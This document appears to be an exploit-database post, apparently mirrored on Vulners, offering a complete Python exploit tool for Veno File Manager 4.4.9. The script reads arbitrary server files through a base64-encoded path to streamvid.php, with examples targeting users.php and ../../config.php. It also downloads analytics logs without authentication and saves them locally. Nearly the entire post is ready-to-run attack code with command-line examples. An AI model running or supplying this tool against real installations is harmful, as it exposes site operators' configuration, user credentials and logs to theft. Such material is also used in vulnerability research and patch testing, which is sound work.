==================================================================================================================================
| # Title : Veno File Manager 4.4.9 - Exploit Tool |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : https://veno.es/updates/logs/?slug=vfm/ |
==================================================================================================================================
[+] Summary : This script is an exploit tool for Veno File Manager 4.4.9 that demonstrates two security issues:
Authenticated file disclosure: uses superadmin cookies to read arbitrary server files.
Unauthenticated log access: downloads system logs without needing login.
It sends HTTP requests to vulnerable endpoints, extracts sensitive data, and can save logs locally for analysis.
[+] POc :
#!/usr/bin/env python3
import requests
import base64
import sys
import argparse
from urllib.parse import urljoin
class VFMExploit:
def __init__(self, target_url):
self.target_url = target_url.rstrip('/')
self.session = requests.Session()
def disclose_file_authenticated(self, cookie_name, cookie_value, file_path):
"""
Vulnerability 1: Arbitrary File Disclosure (Requires superadmin privileges)
"""
print(f"[*] Attempting to read file: {file_path}")
cookies = {cookie_name: cookie_value}
print("[*] Step 1: Changing initial directory to ./")
post_url = urljoin(self.target_url, "/vfm-admin/index.php")
response = self.session.post(
post_url,
cookies=cookies,
data={"starting_dir": "./"},
verify=False
)
print(f"[*] Step 2: Reading file via streamvid.php")
encoded_path = base64.b64encode(file_path.encode()).decode()
get_url = urljoin(self.target_url, f"/vfm-admin/ajax/streamvid.php?vid={encoded_path}")
response = self.session.get(get_url, cookies=cookies, verify=False)
if response.status_code == 200:
print("[✓] File extracted successfully!")
print("="*50)
print(response.text)
print("="*50)
return response.text
else:
print(f"[✗] Extraction failed. Status code: {response.status_code}")
return None
def download_logs_unauthenticated(self, start_date):
"""
Vulnerability 2: Unauthenticated Log Download
"""
print(f"[*] Attempting to download logs since date: {start_date}")
post_url = urljoin(self.target_url, "/vfm-admin/admin-panel/view/analytics/save-csv.php")
data = {
"logsince": start_date,
"loguntil": "3000-12-31"
}
try:
response = self.session.post(post_url, data=data, verify=False, timeout=30)
if response.status_code == 200 and len(response.text) > 0:
print(f"[✓] Logs downloaded successfully! ({len(response.text)} bytes)")
print("="*50)
print(response.text[:2000]) # Display the first 2000 characters only
if len(response.text) > 2000:
print(f"\n... and {len(response.text)-2000} more characters remaining")
print("="*50)
filename = f"logs_{start_date}.csv"
with open(filename, 'w', encoding='utf-8') as f:
f.write(response.text)
print(f"[*] Logs saved to file: {filename}")
return response.text
else:
print(f"[✗] No logs found or download failed")
return None
except Exception as e:
print(f"[✗] Error: {e}")
return None
def exploit_all(self, cookie_name=None, cookie_value=None, file_path=None, start_date=None):
"""
Execute all possible exploit checks
"""
print("="*60)
print("Veno File Manager 4.4.9 - Multi Exploit Tool")
print("="*60)
results = {}
if cookie_name and cookie_value and file_path:
print("\n[+] Executing Exploit 1: File Disclosure")
results['file_disclosure'] = self.disclose_file_authenticated(
cookie_name, cookie_value, file_path
)
if start_date:
print("\n[+] Executing Exploit 2: Log Download")
results['logs_download'] = self.download_logs_unauthenticated(start_date)
return results
def main():
parser = argparse.ArgumentParser(
description='Veno File Manager 4.4.9 - Exploit Tool',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
python exploit.py -u http://target.com/vfm -c PHPSESSID -v abc123 --file vfm-admin/_content/users/users.php
python exploit.py -u http://target.com/vfm --logs 2024-01-01
python exploit.py -u http://target.com/vfm -c PHPSESSID -v abc123 --file ../../config.php --logs 2024-01-01
"""
)
parser.add_argument('-u', '--url', required=True, help='Application path (e.g., http://target.com/vfm)')
parser.add_argument('-c', '--cookie-name', help='Session cookie name for authentication')
parser.add_argument('-v', '--cookie-value', help='Session cookie value for authentication')
parser.add_argument('-f', '--file', help='Path of the file to read (e.g., ../../config.php)')
parser.add_argument('-l', '--logs', help='Download logs starting from date (yyyy-mm-dd)')
args = parser.parse_args()
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
exploit = VFMExploit(args.url)
exploit.exploit_all(
cookie_name=args.cookie_name,
cookie_value=args.cookie_value,
file_path=args.file,
start_date=args.logs
)
if __name__ == "__main__":
main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation